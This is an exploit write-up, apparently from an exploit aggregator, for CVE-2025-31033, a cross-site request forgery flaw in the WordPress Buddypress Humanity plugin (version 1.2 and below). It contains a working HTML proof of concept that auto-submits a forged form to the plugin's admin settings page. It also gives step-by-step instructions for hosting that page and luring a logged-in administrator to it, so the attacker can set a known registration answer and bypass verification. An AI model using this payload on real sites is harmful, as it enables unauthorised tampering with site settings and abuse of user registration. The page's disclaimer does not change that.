## https://sploitus.com/exploit?id=PACKETSTORM:190410
# โ ๏ธ CVE-2025-31033 - CSRF in WordPress Buddypress Humanity Plugin <= 1.2
## ๐ก๏ธ Vulnerability Summary
The **Buddypress Humanity** plugin for WordPress (version <= 1.2) is vulnerable to **Cross-Site Request Forgery (CSRF)**.
This vulnerability allows an attacker to force a higher privileged user (e.g., admin) to unknowingly modify plugin settings (such as the security question and answer), bypassing user verification logic.
---
## ๐ Vulnerability Type
- **Cross Site Request Forgery (CSRF)**
- **Component Affected**: `bph-settings` page (admin only)
- **CVE**: `CVE-2025-31033`
- **Risks** CVSS 9.8
---
## ๐จ Impact
If exploited successfully, this vulnerability allows attackers to:
- Change the **security question** and **answer** used during user registration
- Bypass humanity verification by knowing the new answer
- Automate user registration (possibly combined with privilege escalation)
- Abuse registration form protections without user interaction
---
## ๐ฏ Affected Plugin
- **Name**: Buddypress Humanity
- **Version**: โค 1.2
- **Slug**: `buddypress-humanity`
- **Tested on**: WordPress 6.x + BuddyPress active
---
## ๐ฅ Proof of Concept (HTML Exploit)
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit โ CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="Iโm Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
```
> โ ๏ธ Once this page is opened by an authenticated admin, it silently modifies the plugin settings.
---
## ๐ง How to Exploit
1. Host the PoC HTML on any external server.
2. Trick a logged-in WordPress admin into visiting the page.
3. Upon visit, their browser will silently submit the form.
4. The plugin's security question and answer will be updated.
5. The attacker can now register using the known answer.
---
## ๐งช Successful Exploitation Results In:
- Modified question: **Iโm Nxploited | Khaled Alenazi**
- Modified answer: **Nxploit**
- Any user who inputs "Nxploit" will bypass verification.
---
## โ ๏ธ Disclaimer
> This proof of concept is for **educational purposes only**.
> Use responsibly and **do not test on systems you do not own**.
> The author is **not responsible** for any misuse or damage caused.
---
## ๐ค By
**Nxploited | Khaled Alenazi**